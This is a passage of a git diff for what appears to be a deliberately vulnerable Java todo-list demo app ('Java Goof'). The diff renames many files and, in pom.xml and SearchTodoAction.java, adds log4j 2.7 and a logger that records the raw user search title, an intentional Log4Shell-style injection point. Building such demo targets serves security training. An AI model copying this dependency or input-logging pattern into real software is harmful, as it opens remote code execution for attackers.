b/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java similarity index 100% rename from todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java rename to todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java diff --git a/todolist-web-common/src/main/resources/META-INF/tags/todolist-taglib.tld b/todolist-goof/todolist-web-common/src/main/resources/META-INF/tags/todolist-taglib.tld similarity index 100% rename from todolist-web-common/src/main/resources/META-INF/tags/todolist-taglib.tld rename to todolist-goof/todolist-web-common/src/main/resources/META-INF/tags/todolist-taglib.tld diff --git a/todolist-web-common/src/main/resources/ValidationMessages.properties b/todolist-goof/todolist-web-common/src/main/resources/ValidationMessages.properties similarity index 100% rename from todolist-web-common/src/main/resources/ValidationMessages.properties rename to todolist-goof/todolist-web-common/src/main/resources/ValidationMessages.properties diff --git a/todolist-web-common/src/main/resources/todolist.properties b/todolist-goof/todolist-web-common/src/main/resources/todolist.properties similarity index 100% rename from todolist-web-common/src/main/resources/todolist.properties rename to todolist-goof/todolist-web-common/src/main/resources/todolist.properties diff --git a/todolist-web-struts/Procfile b/todolist-goof/todolist-web-struts/Procfile similarity index 100% rename from todolist-web-struts/Procfile rename to todolist-goof/todolist-web-struts/Procfile diff --git a/todolist-web-struts/pom.xml b/todolist-goof/todolist-web-struts/pom.xml similarity index 85% rename from todolist-web-struts/pom.xml rename to todolist-goof/todolist-web-struts/pom.xml index 7c0aa7c500..e58874f827 100644 --- a/todolist-web-struts/pom.xml +++ b/todolist-goof/todolist-web-struts/pom.xml @@ -3,12 +3,12 @@ todolist-mvc io.github.snyk - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT 4.0.0 todolist-web-struts war - todolist-web-struts Maven Webapp + Java Goof :: Todolist Goof :: Todolist Web Struts @@ -21,7 +21,18 @@ javaee-web-api - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT + + + + org.apache.logging.log4j + log4j-core + 2.7 + + + org.apache.logging.log4j + log4j-api + 2.7 diff --git a/todolist-web-struts/public/good.txt b/todolist-goof/todolist-web-struts/public/good.txt similarity index 100% rename from todolist-web-struts/public/good.txt rename to todolist-goof/todolist-web-struts/public/good.txt diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java similarity index 90% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java index 7d43e4285d..5d3879bba7 100644 --- a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java +++ b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java @@ -30,18 +30,23 @@ import java.util.List; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + /** * Action class to search todo list by title. * * @author Mahmoud Ben Hassine (mahmoud.benhassine@icloud.com) */ public class SearchTodoAction extends BaseAction { + private static final Logger logger = LogManager.getLogger(SearchTodoAction.class); private String title; List todoList; public String execute() { + logger.info("Searching for: " + title); todoList = todoService.searchTodoListByTitle(getSessionUser().getId(), title); return Action.SUCCESS; } diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java diff --git a/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java b/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java similarity index 100% rename from todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java rename to todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java diff --git a/todolist-goof/todolist-web-struts/src/main/resources/log4j2.properties b/todolist-goof/todolist-web-struts/src/main/resources/log4j2.properties new file mode 100644 index 0000000000..424ece1df8 --- /dev/null +++ b/todolist-goof/todolist-web-struts/src/main/resources/log4j2.properties @@ -0,0 +1,16 @@ +# Extra logging related to initialization of Log4j +# Set to debug or trace if log4j initialization is failing +status = warn +# Name of the configuration +name = ConsoleLogConfigDemo + +# Console appender configuration +appender.console.type = Console +appender.console.name = consoleLogger +appender.console.layout.type = PatternLayout +appender.console.layout.pattern = %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n + +# Root logger level +rootLogger.level = info +# Root logger referring to console appender +rootLogger.appenderRef.stdout.ref = consoleLogger \ No newline at end of file diff --git a/todolist-web-struts/src/main/resources/struts.properties b/todolist-goof/todolist-web-struts/src/main/resources/struts.properties similarity index 100% rename from todolist-web-struts/src/main/resources/struts.properties rename to todolist-goof/todolist-web-struts/src/main/resources/struts.properties diff --git a/todolist-web-struts/src/main/resources/struts.xml b/todolist-goof/todolist-web-struts/src/main/resources/struts.xml similarity index 100% rename from todolist-web-struts/src/main/resources/struts.xml rename to todolist-goof/todolist-web-struts/src/main/resources/struts.xml diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/common/error.jspf b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/error.jspf similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/common/error.jspf rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/error.jspf diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/common/footer.jspf b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/footer.jspf similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/common/footer.jspf rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/footer.jspf diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/common/header.jspf b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/header.jspf similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/common/header.jspf rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/header.jspf diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/common/navigationbar.jspf b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/navigationbar.jspf similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/common/navigationbar.jspf rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/navigationbar.jspf diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/common/sidebar.jspf b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/sidebar.jspf similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/common/sidebar.jspf rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/common/sidebar.jspf diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp diff --git a/todolist-web-struts/src/main/webapp/WEB-INF/web.xml b/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml similarity index 100% rename from todolist-web-struts/src/main/webapp/WEB-INF/web.xml rename to todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml diff --git a/todolist-web-struts/src/main/webapp/static/css/bootstrap.min.css b/todolist-goof/todolist-web-struts/src/main/webapp/static/css/bootstrap.min.css similarity index 100% rename from todolist-web-struts/src/main/webapp/static/css/bootstrap.min.css rename to todolist-goof/todolist-web-struts/src/main/webapp/static/css/bootstrap.min.css diff --git a/todolist-web-struts/src/main/webapp/static/css/datepicker.css b/todolist-goof/todolist-web-struts/src/main/webapp/static/css/datepicker.css similarity index 100% rename from todolist-web-struts/src/main/webapp/static/css/datepicker.css rename to todolist-goof/todolist-web-struts/src/main/webapp/static/css/datepicker.css diff --git a/todolist-web-struts/src/main/webapp/static/img/glyphicons-halflings-white.png b/todolist-goof/todolist-web-struts/src/main/webapp/static/img/glyphicons-halflings-white.png similarity index 100% rename from todolist-web-struts/src/main/webapp/static/img/glyphicons-halflings-white.png rename to todolist-goof/todolist-web-struts/src/main/webapp/static/img/glyphicons-halflings-white.png diff --git a/todolist-web-struts/src/main/webapp/static/img/glyphicons-halflings.png b/todolist-goof/todolist-web-struts/src/main/webapp/static/img/glyphicons-halflings.png similarity index 100% rename from todolist-web-struts/src/main/webapp/static/img/glyphicons-halflings.png rename to todolist-goof/todolist-web-struts/src/main/webapp/static/img/glyphicons-halflings.png diff --git a/todolist-web-struts/src/main/webapp/static/img/todolist.ico b/todolist-goof/todolist-web-struts/src/main/webapp/static/img/todolist.ico similarity index 100% rename from todolist-web-struts/src/main/webapp/static/img/todolist.ico rename to todolist-goof/todolist-web-struts/src/main/webapp/static/img/todolist.ico diff --git a/todolist-web-struts/src/main/webapp/static/img/todolist.jpg b/todolist-goof/todolist-web-struts/src/main/webapp/static/img/todolist.jpg similarity index 100% rename from todolist-web-struts/src/main/webapp/static/img/todolist.jpg rename to todolist-goof/todolist-web-struts/src/main/webapp/static/img/todolist.jpg diff --git a/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js b/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js similarity index 100% rename from todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js rename to todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js diff --git a/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js b/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js similarity index 100% rename from todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js rename to todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js diff --git a/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js b/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js similarity index 100% rename from todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js rename to todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js diff --git a/web.xml b/todolist-goof/web.xml similarity index 100% rename from web.xml rename to todolist-goof/web.xml